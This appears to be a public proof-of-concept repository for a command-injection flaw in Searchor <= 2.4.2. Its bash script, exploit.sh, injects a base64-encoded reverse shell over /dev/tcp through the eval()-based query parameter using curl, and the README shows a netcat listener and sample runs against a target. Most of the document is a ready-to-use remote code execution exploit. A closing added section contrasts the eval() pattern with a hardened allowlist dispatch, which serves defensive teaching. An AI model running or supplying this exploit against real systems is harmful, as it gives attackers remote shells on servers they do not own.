├── exploit.sh
└── README.md

/exploit.sh:
--------------------------------------------------------------------------------
#!/bin/bash -

# Reverse-shell PoC for Searchor <= 2.4.2: the "query" parameter is
# interpolated into a Python f-string that is passed to eval(), so a single
# quote terminates the string literal and whatever follows runs as Python.

default_port="9001"
port="${3:-$default_port}"

# Stage 2: the reverse shell, base64-encoded on a single line so it survives
# the nested shell/Python quoting (tr strips the wrapping base64 may add).
rev_shell_b64=$(echo -ne "bash -c 'bash -i >& /dev/tcp/$2/${port} 0>&1'" | base64 | tr -d '\n')

# Stage 1: close the search('... literal, call os.system(), close the
# search(...) call and comment out the rest of the original expression.
evil_cmd="',__import__('os').system('echo ${rev_shell_b64}|base64 -d|bash -i')) # junky comment"

echo "---[Reverse Shell Exploit for Searchor <= 2.4.2 (2.4.0)]---"

# Both the target and the attacker address are required.
if [ $# -ge 2 ]
then
    echo "[*] Input target is $1"
    echo "[*] Input attacker is $2:${port}"
    echo "[*] Run the Reverse Shell... Press Ctrl+C after successful connection"
    # --data-urlencode percent-encodes the payload: a raw '+' from the base64
    # would otherwise be decoded as a space by the server and corrupt stage 2,
    # and '#', '=' and spaces are handled the same way.
    curl -s -X POST "$1/search" --data "engine=Google" --data-urlencode "query=${evil_cmd}" 1> /dev/null
else
    echo "[!] Please specify the IP address of the target and the IP address/port of the attacker for the reverse shell, for example:

./exploit.sh <target> <attacker_ip> [attacker_port, 9001 by default]"
fi
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# POC exploit for Searchor <= 2.4.2 (2.4.0) (Arbitrary CMD Injection)
Reverse Shell POC exploit for **`Searchor <= 2.4.2 (2.4.0)`**

See [**here**](https://security.snyk.io/package/pip/searchor/2.4.0) for a short description of the vulnerability.

[**Link**](https://github.com/ArjunSharda/Searchor) to the GitHub project of Searchor

## Small explanation
In file **`src/searchor/main.py`** of **`Searchor <= 2.4.2`** the `search` command builds a Python expression from the user-controlled `engine` and `query` arguments and passes it to **`eval()`**:
```python
@click.argument("query")
def search(engine, query, open, copy):
    try:
        url = eval(  # <<< See here
            f"Engine.{engine}.search('{query}', copy_url={copy}, open_web={open})"
        )
        click.echo(url)
        searchor.history.update(engine, query, url)
        if open:
            click.echo("opening browser...")
        ...
```
Because `query` is spliced into a single-quoted string literal, a `'` in the input terminates that literal and everything after it is evaluated as Python. A trailing `#` comments out the remainder of the original expression (`', copy_url=..., open_web=...)`) so the injected code stays syntactically valid. That gives arbitrary code execution through functions such as:
* `__import__('os').system('')`
* `__import__('os').popen('').read()`
* etc.

## PoC

Start a netcat listener on the attacker host:
```
$ nc -lvnp 9001
```

Run the exploit (example) with the default port **`9001`** on the attacker host:
```
$ ./exploit.sh site.com 10.10.14.122
---[Reverse Shell Exploit for Searchor <= 2.4.2 (2.4.0)]---
[*] Input target is site.com
[*] Input attacker is 10.10.14.122:9001
[*] Run the Reverse Shell... Press Ctrl+C after successful connection
```
Run the exploit (example) with the specified port **`1337`** on the attacker host:
```
$ ./exploit.sh site.com 10.10.14.122 1337
---[Reverse Shell Exploit for Searchor <= 2.4.2 (2.4.0)]---
[*] Input target is site.com
[*] Input attacker is 10.10.14.122:1337
[*] Run the Reverse Shell... Press Ctrl+C after successful connection
```
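
## Vulnerable and hardened dispatch (added example)

The `eval()` call shown in the explanation above is the whole bug. The block below is an added example, not Searchor's code, that puts the README's eval-based dispatch next to a hardened version and drives both with a payload shaped like the one `exploit.sh` sends. The `Engine` class, its URL templates, the `HITS` sink (which stands in for `os.system(<reverse shell>)`) and the payload are constructed for this demonstration and only mimic the shape of Searchor's API.

```python
"""Added example (not Searchor's code): eval()-based dispatch next to a
hardened version that never evaluates user input.

Engine, its URL templates, HITS and PAYLOAD are constructed for this demo.
"""
import os
from urllib.parse import quote_plus

# Side-effect sink: lets us observe that injected code ran without spawning a shell.
HITS: list = []


class Engine:
    """Stand-in for Searchor's Engine enum: each member exposes search()."""

    class Google:
        @staticmethod
        def search(query, copy_url=False, open_web=False):
            return "https://www.google.com/search?q=" + quote_plus(query)

    class Bing:
        @staticmethod
        def search(query, copy_url=False, open_web=False):
            return "https://www.bing.com/search?q=" + quote_plus(query)


def build_url_vulnerable(engine, query, copy=False, open_web=False):
    """The README's pattern: user input is formatted into source text and eval()'d."""
    return eval(f"Engine.{engine}.search('{query}', copy_url={copy}, open_web={open_web})")


# Allowlist: the engine name is a dict key, never attribute access driven by input.
SUPPORTED_ENGINES = {"Google": Engine.Google, "Bing": Engine.Bing}


def build_url_safe(engine, query, copy=False, open_web=False):
    """Hardened dispatch: look the engine up, pass the query as a plain argument."""
    target = SUPPORTED_ENGINES.get(engine)
    if target is None:
        raise ValueError(f"unsupported engine: {engine!r}")
    return target.search(query, copy_url=copy, open_web=open_web)


# Same structure as the exploit.sh payload: close the literal, run code, close
# search(...) and comment out the tail of the original expression.
# HITS.append(...) replaces os.system(<reverse shell>).
PAYLOAD = "',HITS.append(__import__('os').getpid())) # junky comment"


def demo():
    """Run both builders against the payload and a benign query; report results."""
    HITS.clear()
    vulnerable_url = build_url_vulnerable("Google", PAYLOAD)
    payload_ran_under_eval = HITS == [os.getpid()]   # injected code executed

    HITS.clear()
    safe_url = build_url_safe("Google", PAYLOAD)      # payload is just query text
    payload_ran_under_safe = bool(HITS)

    # Edge case: a benign apostrophe crashes the eval() path (SyntaxError),
    # while the safe path treats it as data.
    try:
        build_url_vulnerable("Google", "O'Reilly")
        apostrophe_crashes_eval = False
    except SyntaxError:
        apostrophe_crashes_eval = True

    try:
        build_url_safe("__class__", "x")
        unknown_engine_rejected = False
    except ValueError:
        unknown_engine_rejected = True

    return {
        "payload_ran_under_eval": payload_ran_under_eval,
        "vulnerable_url": vulnerable_url,
        "payload_ran_under_safe": payload_ran_under_safe,
        "safe_url": safe_url,
        "apostrophe_crashes_eval": apostrophe_crashes_eval,
        "safe_apostrophe_url": build_url_safe("Google", "O'Reilly"),
        "unknown_engine_rejected": unknown_engine_rejected,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Under `eval()` the payload runs before `search()` is even called (Python evaluates the arguments first), and the result is a URL for an empty query because the injected `'` emptied the literal. Under the hardened path the same bytes come back percent-encoded in the query string, and the apostrophe case shows the eval version is also a reliability bug, not only a security one.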